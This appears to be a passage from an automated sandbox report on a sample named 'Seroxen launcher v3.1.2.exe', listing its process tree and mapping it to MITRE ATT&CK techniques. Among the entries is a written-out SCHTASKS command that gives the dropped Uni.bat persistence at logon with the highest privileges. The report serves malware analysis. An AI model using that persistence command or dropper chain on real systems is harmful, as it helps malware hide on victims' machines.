                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1320
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                              1⤵
                                PID:1396
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1452
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2856
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                    1⤵
                                    • Drops file in System32 directory
                                    PID:1532
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1608
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1624
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k NetworkService -p
                                        1⤵
                                          PID:1716
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1732
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1780
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1824
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                1⤵
                                                  PID:1888
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1972
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1984
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:2036
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1472
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2104
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2276
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2392
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                1⤵
                                                                • Drops file in System32 directory
                                                                PID:2536
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2544
                                                                • C:\Windows\sysmon.exe
                                                                  C:\Windows\sysmon.exe
                                                                  1⤵
                                                                    PID:2600
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2632
                                                                  • C:\Windows\System32\svchost.exe
                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                    1⤵
                                                                      PID:2640
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2648
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                          PID:2656
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2684
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2984
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:3084
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                • Modifies Internet Explorer settings
                                                                                • Modifies registry class
                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                • Suspicious use of SendNotifyMessage
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:3328
                                                                                • C:\Users\Admin\AppData\Local\Temp\Seroxen launcher v3.1.2.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\Seroxen launcher v3.1.2.exe"
                                                                                  2⤵
                                                                                  • Enumerates system info in registry
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:1756
                                                                                • C:\Users\Admin\Documents\Uni.bat
                                                                                  "C:\Users\Admin\Documents\Uni.bat"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2336
                                                                                  • C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1480
                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1120
                                                                                  • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2012
                                                                                  • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                    "SCHTASKS.exe" /create /tn "$77Uni.bat" /tr "'C:\Users\Admin\Documents\Uni.bat'" /sc onlogon /rl HIGHEST
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:5036
                                                                                • C:\Users\Admin\Desktop\Uni.bat
                                                                                  "C:\Users\Admin\Desktop\Uni.bat"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4472
                                                                                  • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3272
                                                                                  • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                    "SCHTASKS.exe" /create /tn "$77Uni.bat" /tr "'C:\Users\Admin\Desktop\Uni.bat'" /sc onlogon /rl HIGHEST
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:796
                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      4⤵
                                                                                        PID:4084
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                                                                                    2⤵
                                                                                    • Enumerates system info in registry
                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:4224
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb1f213cb8,0x7ffb1f213cc8,0x7ffb1f213cd8
                                                                                      3⤵
                                                                                        PID:2612
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
                                                                                        3⤵
                                                                                          PID:1684
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
                                                                                          3⤵
                                                                                            PID:340
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2340 /prefetch:8
                                                                                            3⤵
                                                                                              PID:3536
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
                                                                                              3⤵
                                                                                                PID:2704
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
                                                                                                3⤵
                                                                                                  PID:2616
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
                                                                                                  3⤵
                                                                                                    PID:1304
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1
                                                                                                    3⤵
                                                                                                      PID:472
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3376 /prefetch:8
                                                                                                      3⤵
                                                                                                        PID:3276
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 /prefetch:8
                                                                                                        3⤵
                                                                                                          PID:3680
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
                                                                                                          3⤵
                                                                                                            PID:4648
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                                                                                            3⤵
                                                                                                              PID:3032
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:1
                                                                                                              3⤵
                                                                                                                PID:4768
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1856,17557232100365724480,948395069096287308,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2524 /prefetch:2
                                                                                                                3⤵
                                                                                                                  PID:3972
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://temp/
                                                                                                                2⤵
                                                                                                                • Enumerates system info in registry
                                                                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                PID:4328
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb1f213cb8,0x7ffb1f213cc8,0x7ffb1f213cd8
                                                                                                                  3⤵
                                                                                                                    PID:1884
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1920,5209954846403189519,9422868320451431150,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
                                                                                                                    3⤵
                                                                                                                      PID:3080
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1920,5209954846403189519,9422868320451431150,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
                                                                                                                      3⤵
                                                                                                                        PID:3012
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1920,5209954846403189519,9422868320451431150,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
                                                                                                                        3⤵
                                                                                                                          PID:2272
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5209954846403189519,9422868320451431150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
                                                                                                                          3⤵
                                                                                                                            PID:3628
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1920,5209954846403189519,9422868320451431150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
                                                                                                                            3⤵
                                                                                                                              PID:3496
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Seroxen launcher v3.1.2.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Seroxen launcher v3.1.2.exe"
                                                                                                                            2⤵
                                                                                                                            • Enumerates system info in registry
                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:3416
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                          1⤵
                                                                                                                            PID:3480
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                            1⤵
                                                                                                                              PID:3488
                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:3900
                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                  PID:3952
                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                  1⤵
                                                                                                                                    PID:4040
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:4052
                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                                      1⤵
                                                                                                                                        PID:4336
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                                        1⤵
                                                                                                                                          PID:4404
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                          1⤵
                                                                                                                                            PID:3788
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                            1⤵
                                                                                                                                              PID:584
                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                              1⤵
                                                                                                                                                PID:1728
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                1⤵
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:4924
                                                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                1⤵
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:2000
                                                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:3292
                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2380
                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3928
                                                                                                                                                    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
                                                                                                                                                      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
                                                                                                                                                      1⤵
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:1556
                                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3992
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                        1⤵
                                                                                                                                                          PID:3984
                                                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                          1⤵
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                          PID:3308
                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2704
                                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4128
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:3272
                                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3148
                                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3648
                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                    C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                    PID:764
                                                                                                                                                                    • C:\Windows\system32\werfault.exe
                                                                                                                                                                      werfault.exe /h /shared Global\3e390b56d5cb4efda25bdf6519d151d4 /t 3724 /p 1756
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      PID:2732
                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:1212
                                                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4700
                                                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4736
                                                                                                                                                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                          C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          PID:4736
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4528

                                                                                                                                                                          Network

                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                          Initial Access

                                                                                                                                                                          Execution

                                                                                                                                                                          Scheduled Task/Job

                                                                                                                                                                          1
                                                                                                                                                                          T1053

                                                                                                                                                                          Persistence

                                                                                                                                                                          Scheduled Task/Job

                                                                                                                                                                          1
                                                                                                                                                                          T1053

                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                          Scheduled Task/Job

                                                                                                                                                                          1
                                                                                                                                                                          T1053

                                                                                                                                                                          Defense Evasion

                                                                                                                                                                          Modify Registry

                                                                                                                                                                          1
                                                                                                                                                                          T1112

                                                                                                                                                                          Credential Access

                                                                                                                                                                          Discovery

                                                                                                                                                                          Query Registry

                                                                                                                                                                          3
                                                                                                                                                                          T1012

                                                                                                                                                                          System Information Discovery

                                                                                                                                                                          4
                                                                                                                                                                          T1082

                                                                                                                                                                          Lateral Movement

                                                                                                                                                                          Collection

                                                                                                                                                                          Exfiltration

                                                                                                                                                                          Command and Control

                                                                                                                                                                          Web Service

                                                                                                                                                                          1
                                                                                                                                                                          T1102

                                                                                                                                                                          Impact

                                                                                                                                                                          Resource Development

                                                                                                                                                                          Reconnaissance

                                                                                                                                                                          Replay Monitor

                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                          Downloads

